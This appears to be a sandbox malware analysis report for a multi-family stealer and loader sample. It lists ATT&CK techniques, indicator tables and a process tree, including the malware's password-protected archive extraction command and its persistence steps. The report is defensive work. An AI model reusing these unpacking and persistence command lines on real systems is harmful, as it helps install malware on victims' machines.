Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
556	tasklist.exe
392	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2080	573ce1a5ed.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4508 set thread context of 1256	4508	v999f8.exe	380
PID 4128 set thread context of 2828	4128	4eTHv9F.exe	403
PID 5472 set thread context of 5996	5472	08IyOOF.exe	456

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\nudwee.job	EG11t89.exe
File created	C:\Windows\Tasks\ramez.job	Co92cUt4.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2620	sc.exe
4472	sc.exe
3692	sc.exe
4392	sc.exe
5116	sc.exe
4932	sc.exe
2036	sc.exe
3332	sc.exe
3300	sc.exe
2832	sc.exe
4584	sc.exe
1988	sc.exe
1936	sc.exe
2296	sc.exe
3236	sc.exe
1776	sc.exe
4580	sc.exe
1496	sc.exe
2316	sc.exe
4420	sc.exe
5108	sc.exe
1988	sc.exe
1488	sc.exe
4556	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yPZgOUib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OMOEUF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Co92cUt4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	573ce1a5ed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POMRHO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OMOEUF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2S1Sw2mW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qGkirdNH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ODUDDN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RoamingU81CE1A9KTGDPTFLKNQCWXXIEL52REBS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ggWoUHI3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IObitUnlocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JDPJZW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3368	cmd.exe
936	cmd.exe
724	PING.EXE

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
1604	timeout.exe
4352	timeout.exe
2628	timeout.exe
5264	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 7 IoCs

defense_evasion

pid	Process
2544	taskkill.exe
4456	taskkill.exe
1352	taskkill.exe
1040	taskkill.exe
5064	taskkill.exe
1164	taskkill.exe
2572	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133952969895304792"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4097847965-469305640-2969917343-1000\{7837F3E6-23AF-45D2-8743-7E0B21867550}	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2388	reg.exe
2740	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
724	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1632	schtasks.exe
1576	schtasks.exe
4476	schtasks.exe
5380	schtasks.exe
6792	schtasks.exe
6900	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2344	NSudoLG.exe
2344	NSudoLG.exe
4860	NSudoLG.exe
4860	NSudoLG.exe
1336	powershell.exe
1336	powershell.exe
2688	IObitUnlocker.exe
2688	IObitUnlocker.exe
2688	IObitUnlocker.exe
2688	IObitUnlocker.exe
4892	IObitUnlocker.exe
4892	IObitUnlocker.exe
4892	IObitUnlocker.exe
4892	IObitUnlocker.exe
1560	IObitUnlocker.exe
1560	IObitUnlocker.exe
1560	IObitUnlocker.exe
1560	IObitUnlocker.exe
1632	IObitUnlocker.exe
1632	IObitUnlocker.exe
1632	IObitUnlocker.exe
1632	IObitUnlocker.exe
4720	IObitUnlocker.exe
4720	IObitUnlocker.exe
2080	573ce1a5ed.exe
2080	573ce1a5ed.exe
4720	IObitUnlocker.exe
4720	IObitUnlocker.exe
3836	IObitUnlocker.exe
3836	IObitUnlocker.exe
3836	IObitUnlocker.exe
3836	IObitUnlocker.exe
3168	IObitUnlocker.exe
3168	IObitUnlocker.exe
3168	IObitUnlocker.exe
3168	IObitUnlocker.exe
4124	IObitUnlocker.exe
4124	IObitUnlocker.exe
4124	IObitUnlocker.exe
4124	IObitUnlocker.exe
2608	IObitUnlocker.exe
2608	IObitUnlocker.exe
2608	IObitUnlocker.exe
2608	IObitUnlocker.exe
3472	IObitUnlocker.exe
3472	IObitUnlocker.exe
3472	IObitUnlocker.exe
3472	IObitUnlocker.exe
2080	573ce1a5ed.exe
2080	573ce1a5ed.exe
2080	573ce1a5ed.exe
2080	573ce1a5ed.exe
2168	IObitUnlocker.exe
2168	IObitUnlocker.exe
2168	IObitUnlocker.exe
2168	IObitUnlocker.exe
4584	IObitUnlocker.exe
4584	IObitUnlocker.exe
4584	IObitUnlocker.exe
4584	IObitUnlocker.exe
1352	IObitUnlocker.exe
1352	IObitUnlocker.exe
1352	IObitUnlocker.exe
1352	IObitUnlocker.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4184	oSOnryg.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
4184	oSOnryg.exe
4184	oSOnryg.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeRestorePrivilege	3756	HanIpMq9.exe
Token: 35	3756	HanIpMq9.exe
Token: SeSecurityPrivilege	3756	HanIpMq9.exe
Token: SeSecurityPrivilege	3756	HanIpMq9.exe
Token: SeDebugPrivilege	2344	NSudoLG.exe
Token: SeDebugPrivilege	556	tasklist.exe
Token: SeRestorePrivilege	4596	yPZgOUib.exe
Token: 35	4596	yPZgOUib.exe
Token: SeSecurityPrivilege	4596	yPZgOUib.exe
Token: SeSecurityPrivilege	4596	yPZgOUib.exe
Token: SeDebugPrivilege	4860	NSudoLG.exe
Token: SeRestorePrivilege	1332	7z.exe
Token: 35	1332	7z.exe
Token: SeSecurityPrivilege	1332	7z.exe
Token: SeSecurityPrivilege	1332	7z.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeLoadDriverPrivilege	4628	Unlocker.exe
Token: SeDebugPrivilege	5064	taskkill.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	392	tasklist.exe
Token: SeRestorePrivilege	1148	7z.exe
Token: 35	1148	7z.exe
Token: SeSecurityPrivilege	1148	7z.exe
Token: SeSecurityPrivilege	1148	7z.exe
Token: SeLoadDriverPrivilege	2316	Unlocker.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeLoadDriverPrivilege	3912	Unlocker.exe
Token: SeLoadDriverPrivilege	1328	Unlocker.exe
Token: SeDebugPrivilege	2572	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeLoadDriverPrivilege	212	Unlocker.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeLoadDriverPrivilege	2356	Unlocker.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeShutdownPrivilege	2940	chrome.exe
Token: SeCreatePagefilePrivilege	2940	chrome.exe
Token: SeDebugPrivilege	2828	MSBuild.exe
Token: SeShutdownPrivilege	5544	chrome.exe
Token: SeCreatePagefilePrivilege	5544	chrome.exe
Token: SeShutdownPrivilege	5544	chrome.exe
Token: SeCreatePagefilePrivilege	5544	chrome.exe
Token: SeShutdownPrivilege	5544	chrome.exe
Token: SeCreatePagefilePrivilege	5544	chrome.exe
Token: SeDebugPrivilege	5896	chrome.exe
Token: SeRestorePrivilege	7068	7zr.exe
Token: 35	7068	7zr.exe
Token: SeSecurityPrivilege	7068	7zr.exe
Token: SeSecurityPrivilege	7068	7zr.exe
Token: SeDebugPrivilege	6112	AutoIt3_x64.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
4136	KrggRyL3.exe
4136	KrggRyL3.exe
4136	KrggRyL3.exe
3688	oxQ1wSE6.exe
3688	oxQ1wSE6.exe
3688	oxQ1wSE6.exe
3820	cbe5839bbf.exe
3820	cbe5839bbf.exe
3820	cbe5839bbf.exe
1368	EG11t89.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
2940	chrome.exe
3656	msedge.exe
3656	msedge.exe
5544	chrome.exe
5544	chrome.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
4136	KrggRyL3.exe
4136	KrggRyL3.exe
4136	KrggRyL3.exe
3688	oxQ1wSE6.exe
3688	oxQ1wSE6.exe
3688	oxQ1wSE6.exe
3820	cbe5839bbf.exe
3820	cbe5839bbf.exe
3820	cbe5839bbf.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2688	IObitUnlocker.exe
4892	IObitUnlocker.exe
1560	IObitUnlocker.exe
1632	IObitUnlocker.exe
4720	IObitUnlocker.exe
3836	IObitUnlocker.exe
3168	IObitUnlocker.exe
4124	IObitUnlocker.exe
2608	IObitUnlocker.exe
3472	IObitUnlocker.exe
2168	IObitUnlocker.exe
4584	IObitUnlocker.exe
1352	IObitUnlocker.exe
3384	IObitUnlocker.exe
4476	IObitUnlocker.exe
2052	IObitUnlocker.exe
4508	IObitUnlocker.exe
1364	IObitUnlocker.exe
4904	IObitUnlocker.exe
3580	IObitUnlocker.exe
1700	IObitUnlocker.exe
1888	IObitUnlocker.exe
4648	IObitUnlocker.exe
3916	IObitUnlocker.exe
1804	IObitUnlocker.exe
1284	IObitUnlocker.exe
2788	IObitUnlocker.exe
3160	IObitUnlocker.exe
1188	IObitUnlocker.exe
2716	IObitUnlocker.exe
2568	IObitUnlocker.exe
4304	IObitUnlocker.exe
4924	IObitUnlocker.exe
1660	IObitUnlocker.exe
1432	IObitUnlocker.exe
3280	IObitUnlocker.exe
4940	IObitUnlocker.exe
2560	IObitUnlocker.exe
2892	IObitUnlocker.exe
2664	IObitUnlocker.exe
3160	IObitUnlocker.exe
3512	IObitUnlocker.exe
112	IObitUnlocker.exe
1492	IObitUnlocker.exe
2700	IObitUnlocker.exe
2940	IObitUnlocker.exe
4136	IObitUnlocker.exe
4536	IObitUnlocker.exe
4788	IObitUnlocker.exe
4296	IObitUnlocker.exe
2856	IObitUnlocker.exe
1108	IObitUnlocker.exe
2404	IObitUnlocker.exe
3424	IObitUnlocker.exe
4812	IObitUnlocker.exe
3416	IObitUnlocker.exe
4704	IObitUnlocker.exe
2332	IObitUnlocker.exe
1556	IObitUnlocker.exe
2620	IObitUnlocker.exe
4796	IObitUnlocker.exe
3164	IObitUnlocker.exe
3560	IObitUnlocker.exe
1740	IObitUnlocker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5016 wrote to memory of 4136	5016	2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe	88
PID 5016 wrote to memory of 4136	5016	2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe	88
PID 5016 wrote to memory of 4136	5016	2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe	88
PID 4136 wrote to memory of 1956	4136	KrggRyL3.exe	90
PID 4136 wrote to memory of 1956	4136	KrggRyL3.exe	90
PID 4136 wrote to memory of 1956	4136	KrggRyL3.exe	90
PID 1956 wrote to memory of 3756	1956	cmd.exe	92
PID 1956 wrote to memory of 3756	1956	cmd.exe	92
PID 1956 wrote to memory of 3756	1956	cmd.exe	92
PID 4136 wrote to memory of 2088	4136	KrggRyL3.exe	93
PID 4136 wrote to memory of 2088	4136	KrggRyL3.exe	93
PID 4136 wrote to memory of 2088	4136	KrggRyL3.exe	93
PID 4136 wrote to memory of 668	4136	KrggRyL3.exe	94
PID 4136 wrote to memory of 668	4136	KrggRyL3.exe	94
PID 4136 wrote to memory of 668	4136	KrggRyL3.exe	94
PID 4136 wrote to memory of 5056	4136	KrggRyL3.exe	95
PID 4136 wrote to memory of 5056	4136	KrggRyL3.exe	95
PID 4136 wrote to memory of 5056	4136	KrggRyL3.exe	95
PID 5056 wrote to memory of 1632	5056	cmd.exe	97
PID 5056 wrote to memory of 1632	5056	cmd.exe	97
PID 5056 wrote to memory of 1632	5056	cmd.exe	97
PID 668 wrote to memory of 3808	668	2S1Sw2mW.exe	98
PID 668 wrote to memory of 3808	668	2S1Sw2mW.exe	98
PID 668 wrote to memory of 3808	668	2S1Sw2mW.exe	98
PID 2088 wrote to memory of 1464	2088	Co92cUt4.exe	100
PID 2088 wrote to memory of 1464	2088	Co92cUt4.exe	100
PID 2088 wrote to memory of 1464	2088	Co92cUt4.exe	100
PID 3808 wrote to memory of 2320	3808	cmd.exe	101
PID 3808 wrote to memory of 2320	3808	cmd.exe	101
PID 3808 wrote to memory of 708	3808	cmd.exe	102
PID 3808 wrote to memory of 708	3808	cmd.exe	102
PID 3808 wrote to memory of 708	3808	cmd.exe	102
PID 3808 wrote to memory of 2700	3808	cmd.exe	103
PID 3808 wrote to memory of 2700	3808	cmd.exe	103
PID 3808 wrote to memory of 2700	3808	cmd.exe	103
PID 3808 wrote to memory of 936	3808	cmd.exe	104
PID 3808 wrote to memory of 936	3808	cmd.exe	104
PID 3808 wrote to memory of 936	3808	cmd.exe	104
PID 3808 wrote to memory of 2344	3808	cmd.exe	105
PID 3808 wrote to memory of 2344	3808	cmd.exe	105
PID 1464 wrote to memory of 4512	1464	ramez.exe	110
PID 1464 wrote to memory of 4512	1464	ramez.exe	110
PID 1464 wrote to memory of 4512	1464	ramez.exe	110
PID 3808 wrote to memory of 1488	3808	cmd.exe	111
PID 3808 wrote to memory of 1488	3808	cmd.exe	111
PID 3808 wrote to memory of 1488	3808	cmd.exe	111
PID 3808 wrote to memory of 1664	3808	cmd.exe	112
PID 3808 wrote to memory of 1664	3808	cmd.exe	112
PID 3808 wrote to memory of 1664	3808	cmd.exe	112
PID 3808 wrote to memory of 2560	3808	cmd.exe	113
PID 3808 wrote to memory of 2560	3808	cmd.exe	113
PID 3808 wrote to memory of 2560	3808	cmd.exe	113
PID 3808 wrote to memory of 2304	3808	cmd.exe	114
PID 3808 wrote to memory of 2304	3808	cmd.exe	114
PID 3808 wrote to memory of 2304	3808	cmd.exe	114
PID 3808 wrote to memory of 2444	3808	cmd.exe	115
PID 3808 wrote to memory of 2444	3808	cmd.exe	115
PID 3808 wrote to memory of 2444	3808	cmd.exe	115
PID 2444 wrote to memory of 556	2444	cmd.exe	116
PID 2444 wrote to memory of 556	2444	cmd.exe	116
PID 2444 wrote to memory of 556	2444	cmd.exe	116
PID 4512 wrote to memory of 3688	4512	index.exe	117
PID 4512 wrote to memory of 3688	4512	index.exe	117
PID 4512 wrote to memory of 3688	4512	index.exe	117

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2596
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe
  2⤵
  PID:2916
- - C:\Windows\system32\rundll32.exe
    C:\Windows\system32\rundll32.exe
    3⤵
    - Blocklisted process makes network request
    PID:4368

C:\Users\Admin\AppData\Local\Temp\2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5016
- C:\Temper\KrggRyL3.exe
  "C:\Temper\KrggRyL3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ""C:\Temper\HanIpMq9.exe" x -aoa -bso0 -bsp1 "C:\Temper\ZCiCHHff.zip" -pxBMnyqdp -o"C:\Temper""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Temper\HanIpMq9.exe
      "C:\Temper\HanIpMq9.exe" x -aoa -bso0 -bsp1 "C:\Temper\ZCiCHHff.zip" -pxBMnyqdp -o"C:\Temper"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3756
- - C:\Temper\Co92cUt4.exe
    "C:\Temper\Co92cUt4.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
      "C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\10486690101\index.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486690101\index.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4512
      - C:\Temper\oxQ1wSE6.exe
        
        "C:\Temper\oxQ1wSE6.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
